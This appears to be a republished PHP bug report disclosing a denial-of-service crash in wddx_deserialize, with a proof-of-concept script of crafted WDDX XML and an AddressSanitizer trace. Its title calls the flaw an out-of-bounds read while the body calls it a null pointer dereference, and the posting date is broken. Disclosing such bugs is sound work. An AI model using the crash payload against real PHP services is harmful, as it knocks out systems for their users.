PHP 7.0.10 Out-Of-Bounds Read in php_wddx_push_element of wddx.c
Posted on 30 November -0001
<HTML><HEAD><TITLE>PHP 7.0.10 Out-Of-Bounds Read in php_wddx_push_element of wddx.c</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>Description: ------------ CREDIT ----------------------- This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB. PHP VERSION ----------------------- ./sapi/cli/php --version PHP 7.2.0-dev (cli) (built: Sep 11 2016 18:37:49) ( NTS ) Copyright (c) 1997-2016 The PHP Group Zend Engine v3.1.0-dev, Copyright (c) 1998-2016 Zend Technologies PROOF-OF-CONCEPT FILE ----------------------- Posted in the "Test script" section. STACKTRACE ----------------------- Posted in the "Actual result" section. VULNERABILITY DETAILS ----------------------- A DoS (null pointer dereference) vulnerability can be triggered in function wddx_deserialize. To reproduce this issue, please run export USE_ZEND_ALLOC=0 before executing the test script. Test script: --------------- <?php $xml = <<<XML <?xml version='1.0' ?> <!DOCTYPE et SYSTEM 'w'> <wddxPacket ven='1.0'> <array> <var Name="name"> <boolean value="keliu"></boolean> </var> <var name="1111"> <var name="2222"> <var name="3333"></var> </var> </var> </array> </wddxPacket> XML; $array = wddx_deserialize($xml); var_dump($array); ?> Expected result: ---------------- Exit quietly. Actual result: -------------- ==47769==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000046fb9c bp 0x7ffc278e29b0 sp 0x7ffc278e2130 T0) #0 0x46fb9b in __interceptor_strcmp.part.24 (php-src/sapi/cli/php+0x46fb9b) #1 0xac41d4 in php_wddx_push_element php-src/ext/wddx/wddx.c:791:9 #2 0x7fa8715ac67f in _init (/lib/x86_64-linux-gnu/libexpat.so.1+0x867f) #3 0x7fa8715ad38b in _init (/lib/x86_64-linux-gnu/libexpat.so.1+0x938b) #4 0x7fa8715aecad in _init (/lib/x86_64-linux-gnu/libexpat.so.1+0xacad) #5 0x7fa8715af404 in _init (/lib/x86_64-linux-gnu/libexpat.so.1+0xb404) #6 0x7fa8715b170a in XML_ParseBuffer (/lib/x86_64-linux-gnu/libexpat.so.1+0xd70a) #7 0xac1717 in php_wddx_deserialize_ex php-src/ext/wddx/wddx.c:1081:2 #8 0xabad7a in zif_wddx_deserialize php-src/ext/wddx/wddx.c:1299:2 #9 0xfdfb3d in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER php-src/Zend/zend_vm_execute.h:675:2 #10 0xe75f4b in execute_ex php-src/Zend/zend_vm_execute.h:432:7 #11 0xe76ec3 in zend_execute php-src/Zend/zend_vm_execute.h:474:2 #12 0xd00e9e in zend_execute_scripts php-src/Zend/zend.c:1464:4 #13 0xad4425 in php_execute_script php-src/main/main.c:2537:14 #14 0x10fca26 in do_cli php-src/sapi/cli/php_cli.c:990:5 #15 0x10f9f60 in main php-src/sapi/cli/php_cli.c:1378:18 #16 0x7fa86fec582f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291 #17 0x449578 in _start (php-src/sapi/cli/php+0x449578) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (php-src/sapi/cli/php+0x46fb9b) in __interceptor_strcmp.part.24 ==47769==ABORTING </BODY></HTML>